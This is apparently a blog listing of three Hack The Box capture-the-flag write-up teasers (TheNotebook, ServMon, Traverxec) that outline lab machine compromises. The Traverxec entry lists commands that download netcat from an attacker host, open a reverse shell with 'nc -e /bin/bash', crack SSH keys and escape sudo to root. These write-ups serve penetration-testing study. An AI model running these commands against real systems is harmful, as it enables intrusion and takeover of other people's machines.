Hackthebox thenotebook writeup 4.9 (16)

Hackthebox thenotebook writeup

It is a medium level machine from hackthebox which is great for learning new skills . It starts with the abusing of jwt token which leads to admin panel and which further leads to the www-shell . Then a little enumeration we get the ssh keys for the user. For privilege escalation sudo exploitation was enough and a little google gets the work done.

Hackthebox ServMon writeup 3.4 (5)

Hackthebox ServMon writeup

Basic Information Difficulty-EasyType -WindowsPoints-20Maker-dmw0ngUser Blood- sampriti:08 mins, 06 seconds. Root Blood-sampriti:34 mins, 10 seconds. Steps involved 1-Port Scanning2-Searching exploit for NVMS-10003-Directory Traversal(Using Burp just POC)4-FTP enumeration5-Extracting passwords Using Directory Traversal 6-SSH login into Nadine(user.tx)7-Revising FTP and Nmap enumerations8-Checking Service on port 84439-Local port forwarding through SSH10-Searching exploit for NSClient++11-Exploiting NSClient with CLI12-Getting Root.txt Commands involved … Read more

Hack the box(HTB) Traverxec write up 0 (0)

Hack the box(HTB) Traverxec write up

Commands used 1-nmap -sC -sV -O -v -oA initial 10.10.10.42-python getshell.py 10.10.10.165 80 “cd / && mkdir tmp”3-python getshell.py 10.10.10.165 80 “cd /tmp && wget http://10.10.14.20:8000/nc”4-python getshell.py 10.10.10.165 80 “/tmp/nc -e /bin/bash 10.10.14.20 4444″5-cd /home/david/public_www6-base64 backup-ssh-identity-files.tgz7-base64 -d file >>new file8-/usr/share/john/ssh2john.py id_rsa9-john hash –wordlist=/root/Desktop/rockyou.txt10-ssh -i id_rsa [email protected]/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service12-!/bin/bash Steps invloved 1-Enumeration2-Exploiting nostromo 1.9.63-Getting a … Read more

wpChatIcon